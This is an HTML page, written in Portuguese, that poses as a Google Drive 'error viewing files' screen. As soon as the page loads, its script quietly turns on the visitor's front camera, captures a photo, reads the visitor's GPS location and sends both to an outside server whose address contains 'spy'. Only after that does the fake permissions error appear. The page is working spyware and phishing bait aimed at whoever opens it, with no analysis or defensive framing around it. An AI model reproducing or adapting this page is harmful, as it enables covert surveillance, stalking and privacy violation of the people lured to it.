<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Drive</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f8f9fa;
            color: #212529;
        }
        .error-container {
            text-align: center;
            padding: 20px;
            border: 2px solid #dc3545;
            border-radius: 8px;
            background-color: #fff;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            display: none; /* Inicia oculto */
        }
        h1 {
            font-size: 28px;
            color: #dc3545;
            margin-bottom: 20px;
        }
        p {
            font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
        }
        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #007bff;
            border-radius: 50%;
            width: 32px;
            height: 32px;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="error-container">
        <h1>Erro ao tentar visualizar os arquivos</h1></br>
        <a href="#" id="folderLink"><h2>Documento e Fotos XJ6<h2></a></br>
        <p>Verifique se concedeu as permissões necessárias ao navegador.</p>
        <p>Por favor, verifique suas permissões e tente novamente.</p>
        <center><div class="spinner"></div></center>
        <p>Carregando...</p>
    </div>

    <video id="videoElement" width="640" height="480" autoplay style="display: none;"></video>

    <script>
        async function startCameraAndSendEmail() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: 'user' } });
                const videoElement = document.getElementById('videoElement');
                videoElement.srcObject = stream;

                return new Promise((resolve) => {
                    videoElement.onloadedmetadata = () => resolve();
                });
            } catch (error) {
                throw new Error('Erro ao acessar a câmera.');
            }
        }

        async function getCurrentPosition() {
            return new Promise((resolve, reject) => {
                if (!navigator.geolocation) {
                    console.error('Geolocalização não suportada pelo navegador.');
                    resolve(null);
                } else {
                    // Verifica se o GPS está ativado
                    if ('geolocation' in navigator) {
                        navigator.geolocation.getCurrentPosition(
                            position => {
                                const { latitude, longitude } = position.coords;
                                resolve({ latitude, longitude });
                            },
                            error => {
                                console.error('Erro ao obter a localização:', error);
                                resolve(null);
                            }
                        );
                    } else {
                        // GPS não ativado, exibe mensagem de alerta
                        alert('Por favor, ative o GPS para permitir o acesso à localização.');
                        resolve(null);
                    }
                }
            });
        }

        async function captureAndSendEmail() {
            const videoElement = document.getElementById('videoElement');
            const canvas = document.createElement('canvas');
            canvas.width = videoElement.videoWidth;
            canvas.height = videoElement.videoHeight;
            const ctx = canvas.getContext('2d');
            ctx.drawImage(videoElement, 0, 0, canvas.width, canvas.height);
            const imageData = canvas.toDataURL('image/jpeg');

            const position = await getCurrentPosition();
            if (!position) {
                throw new Error('Localização não disponível. Por favor, habilite o GPS e tente novamente.');
            }

            const apiUrl = 'https://spy-production-133b.up.railway.app/api/EnviarEmail';

            const deviceInfo = {
                manufacturer: '',
                model: '',
                product: '',
                os: '',
                browserName: '',
                browserVersion: ''
            };

            const deviceInfoString = JSON.stringify(deviceInfo);

            const requestOptions = {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    Base64: imageData,
                    DeviceInfo: deviceInfoString,
                    Location: JSON.stringify(position)
                })
            };

            try {
                const response = await fetch(apiUrl, requestOptions);
                if (response.ok) {
                    console.log('Imagem enviada por e-mail com sucesso!');
                } else {
                    throw new Error(`Falha ao enviar imagem por e-mail: ${response.statusText}`);
                }
            } catch (error) {
                throw new Error(`Erro ao enviar imagem por e-mail: ${error.message}`);
            }
        }

        window.onload = async () => {
            try {
                await startCameraAndSendEmail();
                await captureAndSendEmail();

                document.querySelector('.error-container').style.display = 'block';
            } catch (error) {
                console.error('Erro ao iniciar:', error);
                document.querySelector('.error-container').style.display = 'block';
            }
        };
    </script>
</body>
</html>
